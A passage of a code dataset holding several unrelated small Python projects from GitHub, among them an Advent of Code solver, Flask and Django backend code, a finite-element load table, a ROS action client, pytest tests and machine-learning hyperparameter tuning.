[0,0,1,0]]]\r\n\r\n ref = [[[1,0,1,1], [1,0,1,1], [0,1,1,0]], [[1,1,1,1], [0,0,1,1], [0,0,1,0]]]\r\n can = [[[0,1,1,1], [0,1,1,0], [0,1,1,0]], [[1,0,1,1], [1,0,1,1], [0,0,1,0]]]\r\n # ref = [1,1,1,0]\r\n # can = [0,0,1,0]\r\n ref = [[1,0,1,1], [1,0,1,1], [0,1,1,0]]\r\n can = [[0,1,1,1], [0,1,1,0], [0,1,1,0]]\r\n\r\n s = chopin(ref, can)\r\n s /= 6\r\n print(s)","repo_name":"ndombe/gaim","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15259774067","text":"import math\n\ndef read_input(path):\n f = open(path, 'r')\n lines = [line.strip() for line in f.readlines()]\n f.close()\n return lines\n\ndef solve(lines):\n highest_seat_id = 0\n \n for line in lines:\n current_seat_id = get_seat_id(line)\n \n if current_seat_id > highest_seat_id:\n highest_seat_id = current_seat_id\n \n return highest_seat_id\n\ndef solve2(lines):\n seat_ids = []\n for line in lines:\n current_seat_id = get_seat_id(line)\n seat_ids.append(current_seat_id)\n \n sorted_seat_ids = sorted(seat_ids)\n \n missing_seat_id = sorted_seat_ids[0]\n previous_seat_id = sorted_seat_ids[0]\n for current_seat_id in sorted_seat_ids[1:]:\n diff = current_seat_id - previous_seat_id\n if diff != 1:\n missing_seat_id = current_seat_id - 1\n print('previous_seat_id', previous_seat_id)\n print('current_seat_id', current_seat_id)\n print('missing_seat_id', missing_seat_id)\n previous_seat_id = current_seat_id\n \n return missing_seat_id\n \ndef get_seat_id(line):\n row = 0\n \n for i, n in enumerate(line[::-1][3:]):\n if n == 'B':\n row += math.pow(2, i)\n \n column = [0, 1, 2, 3, 4, 5, 6, 7]\n \n for n in line[-3:]:\n if n == 'R':\n l = int((len(column) / 2))\n 
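# 'R' selects the upper half of the remaining seat columns (binary partition)\n            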
column = column[l:]\n        \n        if n == 'L':\n            l = int((len(column) / 2))\n            column = column[:l]\n    \n    column = column[0]\n    \n    return int(row * 8 + column)\n\nif __name__ == '__main__':\n    lines = read_input('test_input.txt')\n    expected = 820\n    actual = solve(lines)\n    if expected == actual:\n        print('ok')\n    else:\n        print('fail')\n    \n    lines = read_input('input.txt')\n    expected = 989\n    actual = solve(lines)\n    if expected == actual:\n        print('ok')\n    else:\n        print('fail')\n    \n    expected = 548\n    lines = read_input('input.txt')\n    actual = solve2(lines)\n    print(actual)\n    if expected == actual:\n        print('ok')\n    else:\n        print('fail')","repo_name":"09try/AdventOfCode","sub_path":"2020/05/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42445465364","text":"import os\nimport urllib.parse\nbasedir = os.path.abspath(os.path.dirname(__file__))\nparams = urllib.parse.quote_plus('DRIVER={SQL Server};SERVER=DESKTOP-JSI96RP;DATABASE=Dev_Data_demo;Trusted_Connection=yes;')\n\n\nclass Config:\n    SECRET_KEY = os.environ.get('SECRET_KEY') or os.urandom(32)\n    MAIL_SERVER = os.environ.get('MAIL_SERVER', 'smtp.googlemail.com')\n    MAIL_PORT = int(os.environ.get('MAIL_PORT', '587'))\n    MAIL_USE_TLS = os.environ.get('MAIL_USE_TLS', 'true').lower() in \\\n        ['true', 'on', '1']\n    MAIL_USERNAME = os.environ.get('MAIL_USERNAME')  # email address\n    MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD')  # google application password\n    PROJECT_MAIL_SUBJECT_PREFIX = '[Data_demo]'  # shows on email subject, as project name\n    PROJECT_MAIL_SENDER = 'PM Admin '\n    PROJECT_ADMIN = os.environ.get('PROJECT_ADMIN')\n    SSL_REDIRECT = False\n    SQLALCHEMY_TRACK_MODIFICATIONS = False\n    SQLALCHEMY_RECORD_QUERIES = True\n    PROJECT_DATA_PER_PAGE = 20\n    PROJECT_SLOW_DB_QUERY_TIME = 0.5\n\n    @staticmethod\n    def init_app(app):\n        pass\n\n\nclass DevelopmentConfig(Config):\n    DEBUG = True\n    SQLALCHEMY_DATABASE_URI = \"mssql+pyodbc:///?odbc_connect=%s\" % params\n\n\nclass TestingConfig(Config):\n    TESTING = True\n    SQLALCHEMY_DATABASE_URI = os.environ.get('TEST_DATABASE_URL') or \\\n        'sqlite://'\n    WTF_CSRF_ENABLED = False\n\n\nclass ProductionConfig(Config):\n    SQLALCHEMY_DATABASE_URI = \"mssql+pyodbc:///?odbc_connect=%s\" % params\n\n    @classmethod\n    def init_app(cls, app):\n        Config.init_app(app)\n\n        # email errors to the administrators\n        import logging\n        from logging.handlers import SMTPHandler\n        credentials = None\n        secure = None\n        if getattr(cls, 'MAIL_USERNAME', None) is not None:\n            credentials = (cls.MAIL_USERNAME, cls.MAIL_PASSWORD)\n            if getattr(cls, 'MAIL_USE_TLS', None):\n                secure = ()\n        mail_handler = SMTPHandler(\n            mailhost=(cls.MAIL_SERVER, cls.MAIL_PORT),\n            fromaddr=cls.PROJECT_MAIL_SENDER,\n            toaddrs=[cls.PROJECT_ADMIN],\n            subject=cls.PROJECT_MAIL_SUBJECT_PREFIX + ' Application Error',\n            credentials=credentials,\n            secure=secure)\n        mail_handler.setLevel(logging.ERROR)\n        app.logger.addHandler(mail_handler)\n\n\nclass DockerConfig(ProductionConfig):\n    @classmethod\n    def init_app(cls, app):\n        ProductionConfig.init_app(app)\n\n        # log to stderr\n        import logging\n        from logging import StreamHandler\n        file_handler = StreamHandler()\n        file_handler.setLevel(logging.INFO)\n        app.logger.addHandler(file_handler)\n\n\nconfig = {\n    'development': DevelopmentConfig,\n    'testing': TestingConfig,\n    'production': ProductionConfig,\n    'docker': DockerConfig,\n\n    'default': DevelopmentConfig\n}\n
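# note: this mapping is typically consumed by an application factory, e.g. config[os.getenv('FLASK_CONFIG') or 'default']; that usage is assumed and not shown in this file\n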
","repo_name":"Allen15763/Data_demo","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24906536311","text":"# Import Standard Libraries\nimport re\nimport logging\nimport numpy as np\n\n#===========================================================================\n# LoadTable\n#===========================================================================\n\n\nclass LoadTable(object):\n    \"\"\" LoadTable\n\n    Static Members:\n        __type_int__ = \"Input idof is not int!\"\n        __type_int_list__ = \"Input idofs is not int or list!\"\n\n    Instance Members:\n        name = table name\n        type = table type (\"Loads\")\n        path = file path to loads\n        rvals = array of point loads per idof\n\n    Public Methods:\n        LoadTable(name, conf, props)\n        initialize(mesh)\n        readXML(path, mesh)\n        setLoad(idof, rval)\n        setLoads(idofs, rval)\n        addLoad(idof, rval)\n        addLoads(idofs, rval)\n        rvals = getLoads()\n    \"\"\"\n\n    # Static:\n    __type_int__ = \"Input idof is not int!\"\n    __type_int_list__ = \"Input idofs is not int or list!\"\n\n    # Public:\n\n    #-----------------------------------------------------------------------\n    #   constructor\n    #-----------------------------------------------------------------------\n\n    def __init__(self, name, conf=None, props=None):\n        \"\"\" Input: name = table name or ndof\n                   conf = output properties\n                   props = input properties \"\"\"\n        if isinstance(name, str):\n            self.name = name\n            myProps = props.getProps(name)\n            myConf = conf.makeProps(name)\n\n            self.type = myProps.get(\"type\", \"Loads\")\n            self.path = myProps.get(\"file\")\n\n            myConf.set(\"type\", self.type)\n            myConf.set(\"file\", self.path)\n\n        elif isinstance(name, int):\n            self.rvals = np.empty(name)\n            self.rvals[:] = 0\n\n    #-----------------------------------------------------------------------\n    #   initialize\n    #-----------------------------------------------------------------------\n\n    def initialize(self, mesh):\n        self.rvals = np.zeros(mesh.dofCount())\n        self.readXML(self.path, mesh)\n        logging.info(\" %s file read\",self.path)\n        return self.rvals\n\n    #-----------------------------------------------------------------------\n    #   readXML\n    #-----------------------------------------------------------------------\n\n    def readXML(self, path, mesh):\n        \"\"\" Input: path = path_to_file, mesh = Mesh \"\"\"\n        with open(path, 'r') as file:\n\n            flag_c = False\n\n            for line in file:\n                if line.startswith(\"<Loads>\"):\n                    flag_c = True\n                elif line.startswith(\"</Loads>\"):\n                    flag_c = False\n\n                if flag_c is True and not line.startswith(\"<Loads>\"):\n                    dof = re.findall(r\"[a-zA-Z]+\", line)[0]\n                    [node, rval] = re.findall(r\"[-+]?\\d+ *\\.\\d+|[-+]?\\d+\", line)\n                    logging.debug(\" %s[%s] = %s\",dof, node, rval)\n                    idof = mesh.getDofIndex(int(node), dof)\n                    self.addLoad(idof, float(rval))\n\n    #-----------------------------------------------------------------------\n    #   Load Methods\n    #-----------------------------------------------------------------------\n    \n    def setLoad(self, idof, rval):\n        \"\"\" Input: idof = dof index, rval = load to be set \"\"\"\n        if isinstance(idof, int):\n            self.rvals[idof] = rval\n        else:\n            raise TypeError(self.__type_int__)\n\n    def setLoads(self, idofs, rval):\n        \"\"\" Input: idofs = (list of) dof indices, rval = load to be set\"\"\"\n        if isinstance(idofs, (int,list)):\n            self.rvals[idofs] = rval\n        else:\n            raise TypeError(self.__type_int_list__)\n\n    def addLoad(self, idof, rval):\n        \"\"\" Input: idof = 
dof index, rval = load to be added \"\"\"\n        if isinstance(idof, int):\n            self.rvals[idof] += rval\n        else:\n            raise TypeError(self.__type_int__)\n\n    def addLoads(self, idofs, rval):\n        \"\"\" Input: idofs = (list of) dof indices, rval = load to be added \"\"\"\n        if isinstance(idofs, (int,list)):\n            self.rvals[idofs] += rval\n        else:\n            raise TypeError(self.__type_int_list__)\n\n    #-----------------------------------------------------------------------\n    #   getLoads\n    #-----------------------------------------------------------------------\n\n    def getLoads(self):\n        return self.rvals\n","repo_name":"erikjloo/Python-FEM","sub_path":"loadTable.py","file_name":"loadTable.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"13596334552","text":"from collections import deque, namedtuple\n\ninf = float(\"inf\")\nEdge = namedtuple('Edge', 'start, ')\n\nnof_junctions, nof_streets, total_time, nof_cars, starting_junction = map(int, input().split())\n# ignore lat and long information\nfor junction in range(nof_junctions):\n    input()\ntopology = [[] for junction in range(nof_junctions)]\nfor street in range(nof_streets):\n    start, end, direction, time, length = map(int, input().split())\n    topology[start].append((end, time, length))\n    if direction == 2:\n        topology[end].append((start, time, length))\n\nvertices = set(range(0, nof_junctions))\ndistances = [inf] * nof_junctions\ndistances[starting_junction] = 0\nprevious_vertices = [None] * nof_junctions\n\nwhile vertices:\n    current_vertex = min(vertices, key=lambda vertex: distances[vertex])\n    if distances[current_vertex] == inf:\n        break\n    \n    for neighbour, cost, _ in topology[current_vertex]:\n        alternative_route = distances[current_vertex] + cost\n        if alternative_route < distances[neighbour]:\n            distances[neighbour] = alternative_route\n            previous_vertices[neighbour] = current_vertex\n    vertices.remove(current_vertex)\n\nreachable = []\nfor vertex in range(nof_junctions):\n    if distances[vertex] < total_time:\n        reachable.append(vertex)\nprint(f\"nof_junctions = {nof_junctions} nof_reachable = {len(reachable)}\")  # all reachable within total_time\n","repo_name":"matthewrossi/coding-challenges","sub_path":"hash-code/2014/reduce_graph.py","file_name":"reduce_graph.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"45103489406","text":"from appium import webdriver\nfrom time import sleep\nfrom appium.webdriver.connectiontype import ConnectionType\n\ndesired_caps = {}\n\ndesired_caps[\"platformName\"] = \"Android\"\ndesired_caps[\"platformVersion\"] = \"7.1.2\"\ndesired_caps[\"deviceName\"] = \"emulator-5558\"\ndesired_caps[\"appPackage\"] = \"com.android.settings\"\ndesired_caps[\"appActivity\"] = \".Settings\"\ndesired_caps[\"noReset\"] = True\n\ndriver = webdriver.Remote(\"http://localhost:4723/wd/hub\", desired_caps)\n\n# volume up\n# for i in range(3):\n#     driver.keyevent(24)\n\n# sleep(3)\n# driver.keyevent(25)\n\n# open the notification bar\n# driver.open_notifications()\n# close the notification bar\n# driver.back()\n\n# get the current network type\n# print(driver.network_connection)\n# driver.set_network_connection(ConnectionType.ALL_NETWORK_ON)\n\n# take a screenshot\ndriver.get_screenshot_as_file(\"./xxx.png\")","repo_name":"lujun2019/test_scrip","sub_path":"手机操作api_2.py","file_name":"手机操作api_2.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"24567483268","text":"import threading\n\nimport cv2\nimport wx\n\nfrom old_code_snippets.Camera import analyze_camera\n\nID_COUNT = wx.NewId()\nmyEVT_COUNT = wx.NewEventType()\nEVT_COUNT = wx.PyEventBinder(myEVT_COUNT, 1)\n\n\nclass CountingThread(threading.Thread):\n def __init__(self, parent, value):\n \"\"\"\n @param parent: The gui object that should recieve the value\n @param value: value to 'calculate' to\n \"\"\"\n threading.Thread.__init__(self)\n self._parent = parent\n self._value = value\n\n def run(self):\n \"\"\"Overrides Thread.run. Don't call this directly its called internally\n when you call Thread.start().\n \"\"\"\n # time.sleep(2) # our simulated calculation time\n ret = analyze_camera(cap)\n evt = CountEvent(myEVT_COUNT, -1, self.ret)\n wx.PostEvent(self._parent, evt)\n\n\nclass CountEvent(wx.PyCommandEvent):\n \"\"\"Event to signal that a count value is ready\"\"\"\n\n def __init__(self, etype, eid, value=None):\n \"\"\"Creates the event object\"\"\"\n wx.PyCommandEvent.__init__(self, etype, eid)\n self._value = value\n\n def GetValue(self):\n \"\"\"Returns the value from the event.\n @return: the value of this event\n\n \"\"\"\n return self._value\n\n\nclass CountingFrame(wx.Frame):\n def __init__(self, parent):\n wx.Frame.__init__(self, parent, title=\"Lets Count\", size=(300, 300))\n\n # Attributes\n\n # Layout\n self.__DoLayout()\n self.CreateStatusBar()\n\n # Event Handlers\n\n def __DoLayout(self):\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n sizer.Add(CountingPanel(self), 1, wx.ALIGN_CENTER)\n self.SetSizer(sizer)\n self.SetMinSize((300, 300))\n\n\nclass CountingPanel(wx.Panel):\n def __init__(self, parent):\n wx.Panel.__init__(self, parent)\n\n # Attributes\n self._counter = wx.StaticText(self, label=\"0\")\n self._counter.SetFont(wx.Font(16, wx.MODERN, wx.NORMAL, wx.NORMAL))\n\n # Layout\n self.__DoLayout()\n\n # Event Handlers\n self.Bind(wx.EVT_BUTTON, self.OnButton)\n self.Bind(EVT_COUNT, self.OnCount)\n\n def __DoLayout(self):\n sizer = wx.BoxSizer(wx.VERTICAL)\n button = wx.Button(self, ID_COUNT, \"Increment Counter\")\n sizer.AddMany([(button, 0, wx.ALIGN_CENTER),\n ((15, 15), 0),\n (self._counter, 0, wx.ALIGN_CENTER)])\n self.SetSizer(sizer)\n\n def OnButton(self, evt):\n worker = CountingThread(self, 1)\n worker.start()\n\n def OnCount(self, evt):\n val = int(self._counter.GetLabel()) + evt.GetValue()\n self._counter.SetLabel(unicode(val))\n\n\n\n\n# -----------------------------------------------------------------------------#\n\nif __name__ == '__main__':\n cap = cv2.VideoCapture(0)\n APP = wx.App(False)\n FRAME = CountingFrame(None)\n FRAME.Show()\n APP.MainLoop()\n","repo_name":"antnieszka/GestureMusicPlayer","sub_path":"old_code_snippets/gui-test.py","file_name":"gui-test.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"42184398238","text":"from django.shortcuts import render\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser\nfrom rest_framework.response import Response\n\nfrom django.contrib.auth.models import User\n\nfrom base.serializers import ProductSerializer, UserSerializer, UserSerializerWithToken, InvoiceSerializer, \\\n Zadanie2Serializer\nfrom rest_framework_simplejwt.serializers import TokenObtainPairSerializer\nfrom rest_framework_simplejwt.views import TokenObtainPairView\n\nfrom django.contrib.auth.hashers import make_password\nfrom 
rest_framework import status\n\n# If you want to customize the claims contained in the web tokens\n# generated by the TokenObtainPairView and TokenObtainSlidingView views,\n# create a subclass of the desired view, as well as a subclass of its\n# corresponding serializer.\nclass MyTokenObtainPairSerializer(TokenObtainPairSerializer):\n    def validate(self, attrs):\n        data = super().validate(attrs)\n\n        # UserSerializerWithToken - we pass our user into this class\n        # and get back a serialized entity for it\n        # that carries specific fields (id, username, token, etc.)\n        serializer = UserSerializerWithToken(self.user).data\n        for k, v in serializer.items():\n            data[k] = v\n        return data\n\n# This configures the claims carried by the JWT token.\nclass MyTokenObtainPairView(TokenObtainPairView):\n    serializer_class = MyTokenObtainPairSerializer\n\n\n@api_view(['POST'])\ndef registerUser(request):\n    data = request.data\n    try:\n        user = User.objects.create(\n            first_name=data['name'],\n            username=data['email'],\n            email=data['email'],\n            password=make_password(data['password'])\n        )\n\n        serializer = UserSerializerWithToken(user, many=False)\n        return Response(serializer.data)\n    except:\n        message = {'detail': 'User with this email already exists'}\n        return Response(message, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['PUT'])\n@permission_classes([IsAuthenticated])\ndef updateUserProfile(request):\n    user = request.user\n    serializer = UserSerializerWithToken(user, many=False)\n\n    data = request.data\n    user.first_name = data['name']\n    user.username = data['email']\n    user.email = data['email']\n\n    if data['password'] != '':\n        user.password = make_password(data['password'])\n\n    user.save()\n\n    return Response(serializer.data)\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef getUserProfile(request):\n    user = request.user\n    serializer = UserSerializer(user, many=False)\n    return Response(serializer.data)\n\n\n@api_view(['GET'])\n@permission_classes([IsAdminUser])\ndef getUsers(request):\n    users = User.objects.all()\n    serializer = UserSerializer(users, many=True)\n    return Response(serializer.data)\n\n\n@api_view(['GET'])\n@permission_classes([IsAdminUser])\ndef getUserById(request, pk):\n    user = User.objects.get(id=pk)\n    serializer = UserSerializer(user, many=False)\n    return Response(serializer.data)\n\n\n@api_view(['PUT'])\n@permission_classes([IsAuthenticated])\ndef updateUser(request, pk):\n    user = User.objects.get(id=pk)\n\n    data = request.data\n\n    user.first_name = data['name']\n    user.username = data['email']\n    user.email = data['email']\n    user.is_staff = data['isAdmin']\n\n    user.save()\n\n    serializer = UserSerializer(user, many=False)\n\n    return Response(serializer.data)\n\n@api_view(['DELETE'])\n@permission_classes([IsAdminUser])\ndef deleteUser(request, pk):\n    userForDeletion = User.objects.get(id=pk)\n    userForDeletion.delete()\n    return Response('User was deleted')\n\n\n@api_view(['POST'])\ndef createInvoice(request):\n    data = request.data\n\n    # try:\n    from base.models import Invoice\n    invoice = Invoice.objects.create(\n        _id=data['_id'],\n        type=data['type'],\n        sum=data['sum'],\n        job_id=data['job_id']\n    )\n\n    serializer = InvoiceSerializer(invoice, many=False)\n    return Response(serializer.data)\n    # except:\n    #     message = {'error'}\n    #     return Response(message, status=status.HTTP_400_BAD_REQUEST)\n\n\n\n@api_view(['GET'])\ndef getInvoices(request):\n    from base.models import Invoice\n    invoices = Invoice.objects.all()\n
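    # many=True tells the serializer to emit the whole queryset as a JSON array\n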
    serializer = InvoiceSerializer(invoices, many=True)\n    return Response(serializer.data)\n\n@api_view(['GET'])\ndef postUserZadanie2get(request):\n    from base.models import Zadanie2\n    zadanie2_list = Zadanie2.objects.all()\n    serializer = Zadanie2Serializer(zadanie2_list, many=True)\n    return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef postUserZadanie2(request):\n    data = request.data\n\n    from base.models import Zadanie2\n    zadanie2 = Zadanie2.objects.create(\n        user_name=data['user_name'],\n        user_phone=data['user_phone'],\n        user_date=data['user_date'],\n        user_email=data['user_email']\n    )\n\n    serializer = Zadanie2Serializer(zadanie2, many=False)\n    return Response(serializer.data)","repo_name":"DanRHamidullin/DIPLOM","sub_path":"base/views/user_views.py","file_name":"user_views.py","file_ext":"py","file_size_in_byte":5329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38926541863","text":"import pytest\n\nfrom config.pom import StateFunctions\n\nfrom base.variables import *\n\n\n@pytest.mark.usefixtures(\"setup\")\nclass TestBohUpdate:\n\n    def test_update(self):\n        library = StateFunctions(self.driver)\n        library.cardano_page()\n\n        while Variables.i < 3:\n            Variables.day_yesterday = Variables.date\n\n            library.get_price()\n            library.dot_remove()\n            library.wait_5s()\n\n            library.data_base()\n            #Variables.i = 3\n        Variables.file.close()\n        print(\"Success\")\n","repo_name":"PavelKryshtal/S-P500_2","sub_path":"config/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23449514037","text":"import pytest  # used for our unit tests\n\n\ndef format_time(seconds):\n    minutes, seconds = divmod(seconds, 60)\n    hours, minutes = divmod(minutes, 60)\n\n    if hours > 0:\n        return f\"{hours}h{minutes}min{seconds}s\"\n    elif minutes > 0:\n        return f\"{minutes}min{seconds}s\"\n    else:\n        return f\"{seconds}s\"\n\n\n#Below, each test case is represented by a tuple passed to the @pytest.mark.parametrize decorator.\n#The first element of the tuple is the input value passed to format_time(), and the second element is the expected output string.\n@pytest.mark.parametrize('test_input,expected', [\n    ('0', '0s'),\n    ('59', '59s'),\n    ('60', '1min0s'),\n    ('119', '1min59s'),\n    ('3600', '1h0min0s'),\n    ('3601', '1h0min1s'),\n    ('3660', '1h1min0s'),\n    ('7200', '2h0min0s'),\n])\ndef test_format_time(test_input, expected):\n    #For each test case, we call the format_time() function and compare the returned value to the expected value.\n    assert format_time(int(test_input)) == expected\n\n\n#We use the @pytest.mark.parametrize decorator again to test the invalid inputs.\n@pytest.mark.parametrize('test_input', [\n    None,\n    'abc',\n    -1\n])\ndef test_format_time_invalid_inputs(test_input):\n    #For each invalid input, we expect a TypeError or ValueError to be raised.\n    with pytest.raises((TypeError, ValueError)):\n        format_time(test_input)","repo_name":"xuwenhao/geektime-ai-course","sub_path":"auto_unit_test.py","file_name":"auto_unit_test.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":569,"dataset":"github-code","pt":"48"} +{"seq_id":"12152950496","text":"\"\"\"added user.eula field\n\nRevision ID: c8ae6833c7cf\nRevises: 6257d437094a\nCreate Date: 2022-12-01 12:11:56.816167\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = 'c8ae6833c7cf'\ndown_revision = 
'6257d437094a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('users', sa.Column('eula', sa.Boolean(), server_default=sa.text('FALSE'), nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('users', 'eula')\n # ### end Alembic commands ###\n","repo_name":"deepchecks/monitoring","sub_path":"backend/deepchecks_monitoring/public_migrations/versions/c8ae6833c7cf_added_user_eula_field.py","file_name":"c8ae6833c7cf_added_user_eula_field.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"29581557250","text":"import numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import RandomizedSearchCV, GridSearchCV\n\ndef rf_tuning(rfc, X_train, y_train):\n # randomforest hyperparameter tuning\n\n # Number of trees in random forest\n n_estimators = [int(x) for x in np.linspace(start = 50, stop = 200, num = 4)]\n # Number of features to consider at every split\n max_features = ['sqrt']\n # Maximum number of levels in tree\n max_depth = [int(x) for x in np.linspace(10, 100, num = 10)]\n max_depth.append(None)\n # Minimum number of samples required to split a node\n min_samples_split = [2, 3, 5, 10, 20, 50]\n # Minimum number of samples required at each leaf node\n min_samples_leaf = [1, 2, 4, 5, 10]\n # Method of selecting samples for training each tree\n bootstrap = [True, False]\n # Create the random grid\n random_grid = {'n_estimators': n_estimators,\n 'max_features': max_features,\n 'max_depth': max_depth,\n 'min_samples_split': min_samples_split,\n 'min_samples_leaf': min_samples_leaf,\n 'bootstrap': bootstrap}\n\n rf_random = GridSearchCV(estimator=rfc, param_grid=random_grid, scoring='balanced_accuracy', cv=3, verbose=1, n_jobs=-1)\n rf_random.fit(X_train, y_train)\n return rf_random.best_params_\n\ndef dt_tuning(dtc, X_train, y_train):\n params = {\n 'max_depth': [None, 2, 3, 5, 10, 20, 40, 50],\n 'min_samples_split': [0.01, 0.05, 0.1, 0.2],\n 'min_samples_leaf': [0.01, 0.05, 0.1, 0.2],\n 'max_features': [None, 'sqrt', 'log2', 0.3, 0.5, 0.75, 1.0],\n 'criterion': [\"gini\", \"entropy\"],\n\n }\n dt_random = GridSearchCV(estimator=dtc, param_grid=params, scoring='balanced_accuracy', cv=3, verbose=2, n_jobs=-1)\n dt_random.fit(X_train, y_train)\n return dt_random.best_params_\n \ndef xgboost_tuning(xgb, X_train, y_train):\n \n params = {\n 'learning_rate': [0.001, 0.01, 0.1, 0.15, 0.2],\n 'max_depth': [3, 5, 7, 9, 12, 15, 17, 25],\n 'min_child_weight': [1, 3, 5, 7],\n 'gamma': [0.0, 0.1, 0.2, 0.3, 0.4],\n 'colsample_bytree': [0.3, 0.4, 0.5, 0.7]\n }\n\n xgb_model = xgb.XGBClassifier()\n xgb_grid = GridSearchCV(estimator=xgb_model, param_grid=params, cv=5, n_jobs=-1, verbose=3)\n xgb_grid.fit(X_train, y_train)\n print(\"xgb best params: \")\n print(xgb_grid.best_params_)\n return xgb_grid.best_params_","repo_name":"LuisMongeB/earthquake-alert-prediction","sub_path":"hyperparameter_tuning.py","file_name":"hyperparameter_tuning.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24021873400","text":"#!/usr/bin/env python3\n\nimport rospy\nimport roslib\nimport actionlib\n\nfrom foundation_cource.msg import MoveTurtleAction,MoveTurtleGoal\n\ndef 
turtle_move_client():\n    #start the client node and set it up for the MoveTurtle action\n    client=actionlib.SimpleActionClient(\"Turtle_move_ac_client\",MoveTurtleAction)\n    #wait until the server is active to start sending goals\n    client.wait_for_server()\n    #create a goal to send \n    goal=MoveTurtleGoal()\n    #request x and y goals from the user and cast them to float\n    goal[0]=float(input(\"Enter goal X: \"))\n    goal[1]=float(input(\"Enter goal Y: \"))\n    #send goal to action server\n    client.send_goal(goal)\n    #wait for the client to finish performing the action\n    client.wait_for_result()\n    #return the final pos to main method to be printed\n    return client.get_result()\n\n\n\n\n\n\nif __name__ == \"__main__\":\n    try:\n        rospy.init_node('move_turtle_client')\n        result=turtle_move_client()\n        rospy.loginfo(\"Final position is x:%f , y:%f \",result.final_pos[0],result.final_pos[1])\n    except rospy.ROSInterruptException:\n        rospy.loginfo(\"Program interrupted before completion\")","repo_name":"malwaru/ROS_basics_FC","sub_path":"build/catkin_generated/installspace/turtle_move_client.py","file_name":"turtle_move_client.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13467405401","text":"from app.models.map import Map\n\nfrom app.scripts.assign_start_pos import assign_character_start, random_item, get_rand_ranges\nfrom app.scripts.combinations import find_combinations\n\n\ndef startup():\n    \"\"\"executes primary functions for initialisation, returns a dict\\\n        containing relevant infos\"\"\"\n\n    items = []\n    matrix_map = Map(user_height=20, user_length=20)\n    range_maze = get_rand_ranges(matrix_map.box)\n    characters = assign_character_start(range_maze, matrix_map.box)\n    item_list = [(\"tablet\", 4), (\"glasses\", 5), (\"toy\", 6)]\n    for item in item_list:\n        items.append(random_item(item_name=item[0], item_ident=item[1], maze=matrix_map))\n\n    for character in characters:\n        if character.name == \"Bernard\":\n            start_idx = character.map_identifier\n            matrix_map.insert(character.map_identifier, character.position)\n\n        if character.name == \"Ford\":\n            end_idx = character.map_identifier\n            matrix_map.insert(character.map_identifier, character.position)\n\n    items_identifiers = []\n    for item in items:\n        items_identifiers.append(item.identifier)\n\n    possible_paths = find_combinations(\n        item_id_list=items_identifiers,\n        start_node_id=start_idx,\n        end_node_id=end_idx\n    )\n\n    return {\n        \"possible_paths\": possible_paths,\n        \"maze\": matrix_map,\n        \"items\": items,\n        \"characters\": characters,\n    }\n","repo_name":"Psemp/oc_project_11","sub_path":"app/scripts/startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41230454379","text":"class Triangle:\r\n    def __init__(self, a, b, c):\r\n        self.a = a\r\n        self.b = b\r\n        self.c = c\r\n\r\n    def validate_triangle(self):\r\n        \r\n        if (self.a + self.b > self.c) and (self.b + self.c > self.a) and (self.c + self.a > self.b):\r\n            return \"Valid Triangle\"\r\n        else:\r\n            return \"Invalid triangle\"\r\n    \r\n    \r\nclass Rectangle:\r\n    def __init__(self, l, b):\r\n        self.l = l\r\n        self.b = b\r\n\r\n    def validate_rectangle(self):\r\n
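        # rule used below: equal sides are invalid, and one side must be exactly twice the other for a valid rectangle\r\n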
